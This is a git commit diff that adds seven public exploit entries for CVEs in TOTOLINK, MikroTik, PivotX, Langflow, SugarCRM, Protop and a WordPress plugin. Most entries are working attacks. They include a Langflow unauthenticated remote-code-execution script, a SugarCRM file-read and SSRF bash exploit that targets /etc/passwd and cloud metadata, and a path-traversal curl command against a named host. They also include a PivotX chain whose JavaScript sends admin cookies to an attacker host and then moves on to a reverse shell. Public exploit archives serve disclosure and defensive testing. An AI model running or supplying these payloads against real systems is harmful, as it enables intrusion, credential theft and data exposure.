Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/multiple/hardware/52363.txt

@@ -0,0 +1,16 @@
+# Title: TOTOLINK N300RB 8.54 - Command Execution
+# Author: Skander BELABED - Magellan Sécurité
+# Date: 07/11/2025
+# Vendor: TOTOLINK
+# Product: N300RB
+# Firmware version: 8.54
+# CVE: CVE-2025-52089
+
+## Description:
+A hidden remote support feature protected by a static secret in TOTOLINK
+N300RB firmware version 8.54 allows an authenticated attacker to execute
+arbitrary OS commands with root privileges.
+
+# Reproduce:
+[href](
+https://0x09.dev/posts/toto_decouvre_une_interface_de_debug/)

exploits/multiple/remote/52366.txt

@@ -0,0 +1,20 @@
+# Exploit Title: MikroTik RouterOS 7.19.1 - Reflected XSS
+# Google Dork: inurl:/login?dst=
+# Date: 2025-07-15
+# Exploit Author: Prak Sokchea
+# Vendor Homepage: https://mikrotik.com
+# Software Link: https://mikrotik.com/download
+# Version: RouterOS <= 7.19.1
+# Tested on: MikroTik CHR 7.19.1
+# CVE : CVE-2025-6563
+
+# PoC:
+# Visit the following URL while connected to the vulnerable MikroTik hotspot service:
+# http://<target-ip>/login?dst=javascript:alert(3)
+
+# A reflected XSS will be triggered when the dst parameter is not properly sanitized by the server-side logic.
+# This vulnerability requires user interaction (visiting the link) and may be used in phishing or redirection attacks.
+
+# Notes:
+# This is a non-persistent reflected XSS. It is accepted due to the presence of a valid CVE (CVE-2025-6563),
+# and has been acknowledged by MikroTik as a valid issue.

exploits/multiple/webapps/52361.txt

@@ -0,0 +1,45 @@
+# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
+# Date: July 2025
+# Exploit Author: HayToN
+# Vendor Homepage: https://github.com/pivotx
+# Software Link: https://github.com/pivotx/PivotX
+# Version: 3.0.0 RC3
+# Tested on: Debian 11, PHP 7.4
+# CVE : CVE-2025-52367
+
+## Vulnerability Type:
+Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
+
+## Root Cause:
+In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
+
+Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.
+
+Note: If you are already admin, skip steps 1-7
+## Exploitation Steps:
+1. Login as an authenticated user (normal user, no need for admin).
+
+2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page
+
+3. Create locally a JavaScript file contaning cookie stealing code.
+For example: lol.js
+Containing:
+document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;
+
+4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours):
+
+<script src="http://LOCAL_IP/lol.js"></script>
+
+5. Publish the page.
+
+6. When an admin views the published page in the blog, the XSS will execute in the admin’s context.
+
+7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.
+
+8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file
+
+9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method.
+
+10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)
+
+# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3

exploits/multiple/webapps/52364.py

@@ -0,0 +1,90 @@
+#!/usr/bin/env python3
+# Exploit Title: Langflow 1.2.x - Remote Code Execution (RCE)
+# Date: 2025-07-11
+# Exploit Author: Raghad Abdallah Al-syouf
+# Vendor Homepage: https://github.com/logspace-ai/langflow
+# Software Link: https://github.com/logspace-ai/langflow/releases
+# Version: <= 1.2.x
+# Tested on: Ubuntu / Docker
+# CVE: CVE-2025-3248
+
+# Description:
+#Langflow exposes a vulnerable endpoint `/api/v1/validate/code` that improperly evaluates arbitrary Python code via the `exec()` function. An unauthenticated remote attacker can execute arbitrary system commands.
+
+# Usage:
+#python3 cve-2025-3248.py http://target:7860 "id"
+
+
+
+import requests
+import argparse
+import json
+from urllib.parse import urljoin
+from colorama import Fore, Style, init
+import random
+
+init(autoreset=True)
+requests.packages.urllib3.disable_warnings()
+
+BANNER_COLORS = [Fore.MAGENTA, Fore.CYAN, Fore.LIGHTBLUE_EX]
+
+def show_banner():
+    print(f"""{Style.BRIGHT}{random.choice(BANNER_COLORS)}
+╔════════════════════════════════════════════════════╗
+║          Langflow <= 1.2.x - CVE-2025-3248         ║
+║      Remote Code Execution via exposed API         ║
+║     No authentication — triggers exec() call       ║
+╚════════════════════════════════════════════════════╝
+       Author: Raghad Abdallah Al-syouf
+{Style.RESET_ALL}""")
+
+class LangflowRCE:
+    def __init__(self, target_url, timeout=10):
+        self.base_url = target_url.rstrip('/')
+        self.session = requests.Session()
+        self.session.verify = False
+        self.session.headers = {
+            "User-Agent": "Langflow-RCE-Scanner",
+            "Content-Type": "application/json"
+        }
+        self.timeout = timeout
+
+    def run_payload(self, command):
+        endpoint = urljoin(self.base_url, "/api/v1/validate/code")
+        payload = {
+            "code": (
+                f"def run(cd=exec('raise Exception(__import__(\"subprocess\").check_output(\"{command}\", shell=True))')): pass"
+            )
+        }
+
+        print(f"{Fore.YELLOW}[+] Sending crafted payload to: {endpoint}")
+        try:
+            response = self.session.post(endpoint, data=json.dumps(payload), timeout=self.timeout)
+            print(f"{Fore.YELLOW}[+] HTTP {response.status_code}")
+            if response.status_code == 200:
+                try:
+                    json_data = response.json()
+                    err = json_data.get("function", {}).get("errors", [""])[0]
+                    if isinstance(err, str) and err.startswith("b'"):
+                        output = err[2:-1].encode().decode("unicode_escape").strip()
+                        return output or "[!] No output returned."
+                except Exception as e:
+                    return f"[!] Error parsing response: {e}"
+            return "[!] Target may not be vulnerable or is patched."
+        except Exception as e:
+            return f"[!] Request failed: {e}"
+
+def main():
+    parser = argparse.ArgumentParser(description="PoC - CVE-2025-3248 | Langflow <= v1.2.x Unauthenticated RCE")
+    parser.add_argument("url", help="Target URL (e.g., http://localhost:7860)")
+    parser.add_argument("cmd", help="Command to execute remotely (e.g., whoami)")
+    args = parser.parse_args()
+
+    show_banner()
+    exploit = LangflowRCE(args.url)
+    result = exploit.run_payload(args.cmd)
+
+    print(f"\n{Fore.GREEN}[+] Command Output:\n{Style.RESET_ALL}{result}")
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/52365.txt

@@ -0,0 +1,56 @@
+# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection
+# Author: Egidio Romano aka EgiX
+# Email : n0b0d13s@gmail.com
+
+# Software Link: https://www.sugarcrm.com
+# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.
+# CVE Reference: CVE-2024-58258
+# Vulnerability Description:
+
+User input passed through GET parameters to the /css/preview REST API
+endpoint is not properly sanitized before parsing it as LESS code. This can
+be exploited by remote, unauthenticated attackers to inject and execute
+arbitrary LESS directives. By abusing the @import LESS statement, an
+attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary
+local files on the web server, potentially leading to the disclosure of
+sensitive information.
+
+# Proof of Concept:
+
+#!/bin/bash
+
+echo
+echo "+----------------------------------------------------------------------+";
+echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
+echo "+----------------------------------------------------------------------+";
+
+if [ "$#" -ne 2 ]; then
+    echo -ne "\nUsage.....: $0 <SugarCRM URL> <Local File or SSRF URL>\n"
+    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
+    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
+    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
+    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
+    exit 1
+fi
+
+urlencode() {
+    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
+}
+
+INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
+RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}")
+
+if echo "$RESPONSE" | grep -q "________"; then
+    echo -e "\nOutput for '$2':\n"
+    echo "$RESPONSE" | sed '/________/q' | grep -v '________'
+    echo
+else
+    echo -e "\nError: exploit failed!\n"
+    exit 2
+fi
+
+
+
+# Credits: Vulnerability discovered by Egidio Romano.
+# Original Advisory: http://karmainsecurity.com/KIS-2025-04
+# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/

exploits/multiple/webapps/52367.txt

@@ -0,0 +1,34 @@
+# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
+# Date: 2025-07-09
+# Exploit Author: Imraan Khan (Lich-Sec)
+# Vendor Homepage: https://wss.com/
+# Software Link: https://client.protop.co.za/
+# Version: v4.4.2-2024-11-27
+# Tested on: Ubuntu 22.04 / Linux
+# CVE: CVE-2025-44177
+# CWE: CWE-22 - Path Traversal
+
+# Description:
+# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
+# An unauthenticated remote attacker can retrieve arbitrary files via
+# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
+
+# Vulnerable Endpoint:
+GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+Host: client.protop.co.za
+User-Agent: curl/8.0
+Accept: */*
+
+# Example curl command:
+curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
+
+# Notes:
+# - Vulnerability confirmed on public instance at time of testing.
+# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
+# - The vendor was notified and a fix was issued.
+
+# Disclosure Timeline:
+# - Discovered: 2025-03-13
+# - Disclosed to vendor: 2025-03-20
+# - CVE Assigned: 2025-07-01
+# - Public Disclosure: 2025-07-09

exploits/multiple/webapps/52368.txt

@@ -0,0 +1,60 @@
+# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
+# Google Dork: inurl:/wp-content/plugins/wp-publications/
+# Date: 2025-07-15
+# Exploit Author: Zeynalxan Quliyev
+# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
+# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
+# Version: <= 1.2
+# Tested on: WordPress 6.5.3 / Linux (Apache)
+# CVE: CVE-2024-11605
+
+## Vulnerability Details
+
+The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.
+
+This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).
+
+---
+
+## Proof of Concept (PoC)
+
+1. SSH into the server and navigate to the plugin directory:
+   ```bash
+   cd /var/www/html/wp-content/plugins/wp-publications/
+   ```
+
+2. Run the following command to create a malicious BibTeX file:
+   ```bash
+   touch "<img src=x onerror=alert('XSS')>.bib"
+   ```
+
+3. Access the plugin's BibTeX browser via the following URL:
+   ```
+   https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
+   ```
+
+4. The injected JavaScript will be executed, triggering the XSS payload:
+   ```javascript
+   alert('XSS');
+   ```
+
+---
+
+## Impact
+
+* Stored XSS (JavaScript) is executed in the context of the admin panel.
+* Bypasses `unfiltered_html` protection in multisite environments.
+* Can be used for privilege escalation, cookie theft, or injecting malicious content.
+
+---
+
+## Recommendation
+
+Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
+
+---
+
+## References
+
+* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
+* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)